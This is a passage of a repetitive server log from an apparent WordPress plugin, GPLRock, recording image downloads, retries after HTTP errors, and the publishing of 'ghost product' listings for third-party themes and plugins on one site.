perez-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:38:06 UTC] GPLRock: Image download failed for product perez-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:38:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perez---personal-portfolio-wordpress-theme-3990.webp for product perez-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:38:08 UTC] GPLRock: Image download failed for product perez-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:38:10 UTC] GPLRock: Image download failed for product perez-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 11:38:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/perez---personal-portfolio-wordpress-theme-3990.webp for product perez-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 11:38:12 UTC] GPLRock WARNING: Image download failed for product perez-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/perez---personal-portfolio-wordpress-theme-3990.webp [04-Apr-2026 11:38:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: perez-personal-portfolio-wordpress-theme [04-Apr-2026 16:12:43 UTC] GPLRock: Image downloaded successfully for product thrive-themes-rise-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5726dc14.jpg [04-Apr-2026 16:12:43 UTC] GPLRock: Using pre-downloaded image for product thrive-themes-rise-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5726dc14.jpg [04-Apr-2026 16:12:43 UTC] GPLRock: Ghost product published with image - Product ID: thrive-themes-rise-wordpress-theme [04-Apr-2026 16:12:44 UTC] GPLRock: Image downloaded successfully for product thrive-themes-squared-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bec0c040.jpg [04-Apr-2026 16:12:45 UTC] GPLRock: Using pre-downloaded image for product thrive-themes-squared-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bec0c040.jpg [04-Apr-2026 16:12:45 UTC] GPLRock: Ghost product published with image - Product ID: thrive-themes-squared-wordpress-theme [04-Apr-2026 16:12:46 UTC] GPLRock: Image downloaded successfully for product thrive-themes-storied-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3783f7d.jpg [04-Apr-2026 16:12:46 UTC] GPLRock: Using pre-downloaded image for product thrive-themes-storied-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3783f7d.jpg [04-Apr-2026 16:12:46 UTC] GPLRock: Ghost product published with image - Product ID: thrive-themes-storied-wordpress-theme [04-Apr-2026 16:12:48 UTC] GPLRock: Image downloaded successfully for product thrive-themes-voice-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ffbf4d9.jpg [04-Apr-2026 16:12:49 UTC] GPLRock: Using pre-downloaded image for product thrive-themes-voice-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ffbf4d9.jpg [04-Apr-2026 16:12:49 UTC] GPLRock: Ghost product published with image - Product ID: thrive-themes-voice-wordpress-theme [04-Apr-2026 16:12:51 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-private-comments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dfe261f4.jpg [04-Apr-2026 16:12:52 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-private-comments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dfe261f4.jpg [04-Apr-2026 16:12:52 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-private-comments [04-Apr-2026 16:12:53 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-report-and-flagging (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c56a60e.jpg [04-Apr-2026 16:12:53 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-report-and-flagging: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c56a60e.jpg [04-Apr-2026 16:12:53 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-report-and-flagging [04-Apr-2026 16:12:55 UTC] GPLRock: Image downloaded successfully for product livemesh-addons-for-elementor-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8646d280.jpg [04-Apr-2026 16:12:55 UTC] GPLRock: Using pre-downloaded image for product livemesh-addons-for-elementor-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8646d280.jpg [04-Apr-2026 16:12:55 UTC] GPLRock: Ghost product published with image - Product ID: livemesh-addons-for-elementor-premium [04-Apr-2026 16:12:56 UTC] GPLRock: Image downloaded successfully for product woocommerce-quick-view-pro-by-barn2 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11473c05.jpg [04-Apr-2026 16:12:56 UTC] GPLRock: Using pre-downloaded image for product woocommerce-quick-view-pro-by-barn2: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-11473c05.jpg [04-Apr-2026 16:12:56 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-quick-view-pro-by-barn2 [04-Apr-2026 16:12:58 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wooshop-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9b647b24.jpg [04-Apr-2026 16:12:58 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wooshop-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9b647b24.jpg [04-Apr-2026 16:12:58 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wooshop-wordpress-theme [04-Apr-2026 16:13:00 UTC] GPLRock: Image downloaded successfully for product social-warfare-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cef1ce17.jpg [04-Apr-2026 16:13:00 UTC] GPLRock: Using pre-downloaded image for product social-warfare-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cef1ce17.jpg [04-Apr-2026 16:13:00 UTC] GPLRock: Ghost product published with image - Product ID: social-warfare-pro [04-Apr-2026 16:16:17 UTC] GPLRock: Image downloaded successfully for product calculated-fields-form-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4c8a505b.png [04-Apr-2026 16:16:17 UTC] GPLRock: Using pre-downloaded image for product calculated-fields-form-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4c8a505b.png [04-Apr-2026 16:16:17 UTC] GPLRock: Ghost product published with image - Product ID: calculated-fields-form-pro [04-Apr-2026 16:16:19 UTC] GPLRock: Image downloaded successfully for product woocommerce-and-zoho-crm-connector-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5df7bc4.png [04-Apr-2026 16:16:19 UTC] GPLRock: Using pre-downloaded image for product woocommerce-and-zoho-crm-connector-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5df7bc4.png [04-Apr-2026 16:16:19 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-and-zoho-crm-connector-pro [04-Apr-2026 16:16:21 UTC] GPLRock: Image downloaded successfully for product bookly-customer-information-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-08357803.jpg [04-Apr-2026 16:16:21 UTC] GPLRock: Using pre-downloaded image for product bookly-customer-information-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-08357803.jpg [04-Apr-2026 16:16:21 UTC] GPLRock: Ghost product published with image - Product ID: bookly-customer-information-add-on [04-Apr-2026 16:16:22 UTC] GPLRock: Image downloaded successfully for product farmart-organic-grocery-marketplace-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-36babdaa.jpg [04-Apr-2026 16:16:22 UTC] GPLRock: Using pre-downloaded image for product farmart-organic-grocery-marketplace-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-36babdaa.jpg [04-Apr-2026 16:16:22 UTC] GPLRock: Ghost product published with image - Product ID: farmart-organic-grocery-marketplace-wordpress-theme [04-Apr-2026 16:16:25 UTC] GPLRock: Image download failed for product kingplace-hotel-booking-spa-resort-wordpress-theme-mobile-layout-ready (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 16:16:30 UTC] GPLRock: Image download failed for product kingplace-hotel-booking-spa-resort-wordpress-theme-mobile-layout-ready (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 16:16:34 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2023/12/KingPlace-Hotel-Booking-Spa-Resort-WordPress-Theme.jpg for product kingplace-hotel-booking-spa-resort-wordpress-theme-mobile-layout-ready after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 16:16:36 UTC] GPLRock: Image download failed for product kingplace-hotel-booking-spa-resort-wordpress-theme-mobile-layout-ready (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 16:16:40 UTC] GPLRock: Image download failed for product kingplace-hotel-booking-spa-resort-wordpress-theme-mobile-layout-ready (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 16:16:44 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2023/12/KingPlace-Hotel-Booking-Spa-Resort-WordPress-Theme.jpg for product kingplace-hotel-booking-spa-resort-wordpress-theme-mobile-layout-ready after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 16:16:44 UTC] GPLRock WARNING: Image download failed for product kingplace-hotel-booking-spa-resort-wordpress-theme-mobile-layout-ready. URL: https://www.gplrock.com/wp-content/uploads/2023/12/KingPlace-Hotel-Booking-Spa-Resort-WordPress-Theme.jpg [04-Apr-2026 16:16:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kingplace-hotel-booking-spa-resort-wordpress-theme-mobile-layout-ready [04-Apr-2026 16:16:46 UTC] GPLRock: Image downloaded successfully for product kwordpress-real-thumbnail-generator-efficiently-force-regenerate-thumbnails-in-bulk-or-single (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7ae7737.png [04-Apr-2026 16:16:46 UTC] GPLRock: Using pre-downloaded image for product kwordpress-real-thumbnail-generator-efficiently-force-regenerate-thumbnails-in-bulk-or-single: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7ae7737.png [04-Apr-2026 16:16:46 UTC] GPLRock: Ghost product published with image - Product ID: kwordpress-real-thumbnail-generator-efficiently-force-regenerate-thumbnails-in-bulk-or-single [04-Apr-2026 16:16:47 UTC] GPLRock: Image downloaded successfully for product aenft-nft-minting-collection-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fad61ccc.jpg [04-Apr-2026 16:16:47 UTC] GPLRock: Using pre-downloaded image for product aenft-nft-minting-collection-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fad61ccc.jpg [04-Apr-2026 16:16:47 UTC] GPLRock: Ghost product published with image - Product ID: aenft-nft-minting-collection-wordpress-theme [04-Apr-2026 16:16:48 UTC] GPLRock: Image downloaded successfully for product scalability-pro-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab60d0c8.webp [04-Apr-2026 16:16:48 UTC] GPLRock: Using pre-downloaded image for product scalability-pro-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab60d0c8.webp [04-Apr-2026 16:16:48 UTC] GPLRock: Ghost product published with image - Product ID: scalability-pro-wordpress-plugin [04-Apr-2026 16:16:50 UTC] GPLRock: Image downloaded successfully for product zyllo-online-payment-gateway-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0abd5d6.webp [04-Apr-2026 16:16:50 UTC] GPLRock: Using pre-downloaded image for product zyllo-online-payment-gateway-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0abd5d6.webp [04-Apr-2026 16:16:50 UTC] GPLRock: Ghost product published with image - Product ID: zyllo-online-payment-gateway-elementor-template-kit [04-Apr-2026 16:16:52 UTC] GPLRock: Image downloaded successfully for product zukares-restaurant-cafe-food-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0865cf03.jpg [04-Apr-2026 16:16:52 UTC] GPLRock: Using pre-downloaded image for product zukares-restaurant-cafe-food-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0865cf03.jpg [04-Apr-2026 16:16:52 UTC] GPLRock: Ghost product published with image - Product ID: zukares-restaurant-cafe-food-elementor-template-kit [04-Apr-2026 16:22:01 UTC] GPLRock: Image downloaded successfully for product wpfomify-mailchimp-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e46fbd2.jpg [04-Apr-2026 16:22:01 UTC] GPLRock: Using pre-downloaded image for product wpfomify-mailchimp-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e46fbd2.jpg [04-Apr-2026 16:22:01 UTC] GPLRock: Ghost product published with image - Product ID: wpfomify-mailchimp-addon [04-Apr-2026 16:22:03 UTC] GPLRock: Image downloaded successfully for product super-forms-csv-attachment (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ae47beae.jpg [04-Apr-2026 16:22:03 UTC] GPLRock: Using pre-downloaded image for product super-forms-csv-attachment: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ae47beae.jpg [04-Apr-2026 16:22:03 UTC] GPLRock: Ghost product published with image - Product ID: super-forms-csv-attachment [04-Apr-2026 16:22:04 UTC] GPLRock: Image downloaded successfully for product give-square-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e40e0c3d.jpg [04-Apr-2026 16:22:04 UTC] GPLRock: Using pre-downloaded image for product give-square-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e40e0c3d.jpg [04-Apr-2026 16:22:04 UTC] GPLRock: Ghost product published with image - Product ID: give-square-gateway [04-Apr-2026 16:22:06 UTC] GPLRock: Image downloaded successfully for product css-igniter-blockchain-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-840de6a0.jpg [04-Apr-2026 16:22:06 UTC] GPLRock: Using pre-downloaded image for product css-igniter-blockchain-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-840de6a0.jpg [04-Apr-2026 16:22:06 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-blockchain-wordpress-theme [04-Apr-2026 16:22:07 UTC] GPLRock: Image downloaded successfully for product yith-the-polygon-wordpress-theme-for-video-games (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95134b76.jpg [04-Apr-2026 16:22:07 UTC] GPLRock: Using pre-downloaded image for product yith-the-polygon-wordpress-theme-for-video-games: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95134b76.jpg [04-Apr-2026 16:22:07 UTC] GPLRock: Ghost product published with image - Product ID: yith-the-polygon-wordpress-theme-for-video-games [04-Apr-2026 16:22:09 UTC] GPLRock: Image downloaded successfully for product css-igniter-andros-wordpresstheme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d76942e9.jpg [04-Apr-2026 16:22:09 UTC] GPLRock: Using pre-downloaded image for product css-igniter-andros-wordpresstheme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d76942e9.jpg [04-Apr-2026 16:22:09 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-andros-wordpresstheme [04-Apr-2026 16:22:11 UTC] GPLRock: Image downloaded successfully for product smart-offers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab379604.jpg [04-Apr-2026 16:22:11 UTC] GPLRock: Using pre-downloaded image for product smart-offers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab379604.jpg [04-Apr-2026 16:22:11 UTC] GPLRock: Ghost product published with image - Product ID: smart-offers [04-Apr-2026 16:22:12 UTC] GPLRock: Image downloaded successfully for product userpro-social-wall-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-633d4614.jpg [04-Apr-2026 16:22:12 UTC] GPLRock: Using pre-downloaded image for product userpro-social-wall-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-633d4614.jpg [04-Apr-2026 16:22:12 UTC] GPLRock: Ghost product published with image - Product ID: userpro-social-wall-add-on [04-Apr-2026 16:22:14 UTC] GPLRock: Image downloaded successfully for product ultimate-member-private-content-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aff07ac0.jpg [04-Apr-2026 16:22:14 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-private-content-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aff07ac0.jpg [04-Apr-2026 16:22:14 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-private-content-addon [04-Apr-2026 16:22:15 UTC] GPLRock: Image downloaded successfully for product searchwp-greek-keyword-stemmer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99b34c5c.jpg [04-Apr-2026 16:22:15 UTC] GPLRock: Using pre-downloaded image for product searchwp-greek-keyword-stemmer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99b34c5c.jpg [04-Apr-2026 16:22:15 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-greek-keyword-stemmer [04-Apr-2026 16:24:28 UTC] GPLRock: Image downloaded successfully for product woocommerce-lottery-wordpress-competitions-and-lotteries (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3837373.jpg [04-Apr-2026 16:24:28 UTC] GPLRock: Using pre-downloaded image for product woocommerce-lottery-wordpress-competitions-and-lotteries: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3837373.jpg [04-Apr-2026 16:24:28 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-lottery-wordpress-competitions-and-lotteries [04-Apr-2026 16:24:30 UTC] GPLRock: Image downloaded successfully for product woocommerce-software-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-19a6627c.jpg [04-Apr-2026 16:24:30 UTC] GPLRock: Using pre-downloaded image for product woocommerce-software-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-19a6627c.jpg [04-Apr-2026 16:24:30 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-software-add-on [04-Apr-2026 16:24:32 UTC] GPLRock: Image downloaded successfully for product memberpress-pdf-invoice (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-191d1c50.jpg [04-Apr-2026 16:24:32 UTC] GPLRock: Using pre-downloaded image for product memberpress-pdf-invoice: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-191d1c50.jpg [04-Apr-2026 16:24:32 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-pdf-invoice [04-Apr-2026 16:24:34 UTC] GPLRock: Image downloaded successfully for product memberpress-courses (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-07880c9b.jpg [04-Apr-2026 16:24:34 UTC] GPLRock: Using pre-downloaded image for product memberpress-courses: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-07880c9b.jpg [04-Apr-2026 16:24:34 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-courses [04-Apr-2026 16:24:35 UTC] GPLRock: Image downloaded successfully for product learnpress-gradebook (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37454848.jpg [04-Apr-2026 16:24:35 UTC] GPLRock: Using pre-downloaded image for product learnpress-gradebook: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-37454848.jpg [04-Apr-2026 16:24:35 UTC] GPLRock: Ghost product published with image - Product ID: learnpress-gradebook [04-Apr-2026 16:24:37 UTC] GPLRock: Image downloaded successfully for product woocommerce-zapier (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a7eddf7.jpg [04-Apr-2026 16:24:37 UTC] GPLRock: Using pre-downloaded image for product woocommerce-zapier: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a7eddf7.jpg [04-Apr-2026 16:24:37 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-zapier [04-Apr-2026 16:24:38 UTC] GPLRock: Image downloaded successfully for product woocommerce-customers-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d15101a.jpg [04-Apr-2026 16:24:38 UTC] GPLRock: Using pre-downloaded image for product woocommerce-customers-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d15101a.jpg [04-Apr-2026 16:24:38 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-customers-manager [04-Apr-2026 16:24:40 UTC] GPLRock: Image downloaded successfully for product chatbot-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2f63f306.jpg [04-Apr-2026 16:24:40 UTC] GPLRock: Using pre-downloaded image for product chatbot-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2f63f306.jpg [04-Apr-2026 16:24:40 UTC] GPLRock: Ghost product published with image - Product ID: chatbot-for-wordpress [04-Apr-2026 16:24:41 UTC] GPLRock: Image downloaded successfully for product beaver-builder-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-17636af7.jpg [04-Apr-2026 16:24:41 UTC] GPLRock: Using pre-downloaded image for product beaver-builder-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-17636af7.jpg [04-Apr-2026 16:24:41 UTC] GPLRock: Ghost product published with image - Product ID: beaver-builder-theme [04-Apr-2026 16:24:43 UTC] GPLRock: Image downloaded successfully for product download-monitor-advanced-access-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f70365b.jpg [04-Apr-2026 16:24:43 UTC] GPLRock: Using pre-downloaded image for product download-monitor-advanced-access-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1f70365b.jpg [04-Apr-2026 16:24:43 UTC] GPLRock: Ghost product published with image - Product ID: download-monitor-advanced-access-manager [04-Apr-2026 16:25:38 UTC] GPLRock: Image downloaded successfully for product woopack-for-beaver-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f4956976.jpg [04-Apr-2026 16:25:38 UTC] GPLRock: Using pre-downloaded image for product woopack-for-beaver-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f4956976.jpg [04-Apr-2026 16:25:38 UTC] GPLRock: Ghost product published with image - Product ID: woopack-for-beaver-builder [04-Apr-2026 16:25:40 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-subscription-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b763a279.jpg [04-Apr-2026 16:25:40 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-subscription-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b763a279.jpg [04-Apr-2026 16:25:40 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-subscription-manager [04-Apr-2026 16:25:41 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-widgets (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87b45bf0.jpg [04-Apr-2026 16:25:41 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-widgets: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87b45bf0.jpg [04-Apr-2026 16:25:41 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-widgets [04-Apr-2026 16:25:43 UTC] GPLRock: Image downloaded successfully for product striking-multiflex-ecommerce-responsive-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab56e931.jpg [04-Apr-2026 16:25:43 UTC] GPLRock: Using pre-downloaded image for product striking-multiflex-ecommerce-responsive-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab56e931.jpg [04-Apr-2026 16:25:43 UTC] GPLRock: Ghost product published with image - Product ID: striking-multiflex-ecommerce-responsive-wp-theme [04-Apr-2026 16:25:45 UTC] GPLRock: Image downloaded successfully for product contact-us-all-in-one-button-with-callback-request-feature-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba45dcb5.jpg [04-Apr-2026 16:25:45 UTC] GPLRock: Using pre-downloaded image for product contact-us-all-in-one-button-with-callback-request-feature-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba45dcb5.jpg [04-Apr-2026 16:25:45 UTC] GPLRock: Ghost product published with image - Product ID: contact-us-all-in-one-button-with-callback-request-feature-for-wordpress [04-Apr-2026 16:25:47 UTC] GPLRock: Image downloaded successfully for product boosted-elements-page-builder-add-on-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf0f58e9.jpg [04-Apr-2026 16:25:47 UTC] GPLRock: Using pre-downloaded image for product boosted-elements-page-builder-add-on-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf0f58e9.jpg [04-Apr-2026 16:25:47 UTC] GPLRock: Ghost product published with image - Product ID: boosted-elements-page-builder-add-on-for-elementor [04-Apr-2026 16:25:48 UTC] GPLRock: Image downloaded successfully for product wp-pro-advertising-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d12215c3.jpg [04-Apr-2026 16:25:48 UTC] GPLRock: Using pre-downloaded image for product wp-pro-advertising-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d12215c3.jpg [04-Apr-2026 16:25:48 UTC] GPLRock: Ghost product published with image - Product ID: wp-pro-advertising-system [04-Apr-2026 16:25:50 UTC] GPLRock: Image downloaded successfully for product oceanwp-pro-demos (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a2043ca6.jpg [04-Apr-2026 16:25:50 UTC] GPLRock: Using pre-downloaded image for product oceanwp-pro-demos: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a2043ca6.jpg [04-Apr-2026 16:25:50 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-pro-demos [04-Apr-2026 16:25:51 UTC] GPLRock: Image downloaded successfully for product snax-viral-content-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1dab7d0f.jpg [04-Apr-2026 16:25:51 UTC] GPLRock: Using pre-downloaded image for product snax-viral-content-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1dab7d0f.jpg [04-Apr-2026 16:25:51 UTC] GPLRock: Ghost product published with image - Product ID: snax-viral-content-builder [04-Apr-2026 16:25:53 